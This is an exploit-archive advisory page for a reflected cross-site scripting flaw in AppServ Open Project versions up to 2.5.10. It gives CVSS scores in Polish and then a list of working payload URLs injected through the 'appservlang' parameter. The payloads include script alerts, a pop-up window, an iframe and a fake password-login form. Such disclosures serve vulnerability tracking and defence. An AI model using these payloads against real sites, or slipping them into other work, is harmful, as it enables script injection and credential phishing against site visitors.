AppServ Open Project < = 2.5.10 Remote XSS Vulnerability

2008.05.21
Credit: tan_prathan
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


Ogólna skala CVSS: 4.3/10
Znaczenie: 2.9/10
Łatwość wykorzystania: 8.6/10
Wymagany dostęp: Zdalny
Złożoność ataku: Średnia
Autoryzacja: Nie wymagana
Wpływ na poufność: Brak
Wpływ na integralność: Częściowy
Wpływ na dostępność: Brak

========================================================== AppServ Open Project < = 2.5.10 Remote XSS Vulnerability ========================================================== AUTHOR : CWH Underground DATE : 19 May 2008 SITE : www.citec.us ##################################################### APPLICATION : AppServ Open Project VERSION : <= 2.5.10 VENDOR : [url=http://www.appservnetwork.com]http://www.appservnetwork.com[/url] DOWNLOAD : [url=http://sourceforge.net/project/showfiles.php?group_id=37459]http:// sourceforge.net/project/showfiles.php?group_id=37459[/url] ##################################################### DORK: N/A ---Exploit--- [-] http://[target]/index.php?appservlang=">[XSS] =Example= Alert: [-] http://[target]/index.php?appservlang="><IMG%20SRC=java script:alert(/XSS/)> [-] http://[target]/index.php?appservlang="><BODY%20ONLOAD=alert(/xss/)> Open Window [-] http://[target]/index.php?appservlang="><script>window.open(/phpinfo.php /)</script> [-] http://[target]/index.php?appservlang="><INPUT%20TYPE="xss"> Iframe & Fake Login [-] http://[target]/index.php?appservlang="><iframe%20src=http://www.google. com> [-] http://[target]/index.php?appservlang="><BR><input%20type%20=%20"passwor d"%20name="pass"/><button%20onClick="java script:alert(/I%20have%20your%20password:%20/%20+%20pass.value);">Submit </button><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR > Let's Fun... ################################################################## Greetz: ZeQ3uL,BAD $ectors, Snapter, Conan, Win7dos, JabAv0C ##################################################################


Vote for this issue:
0%
100%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top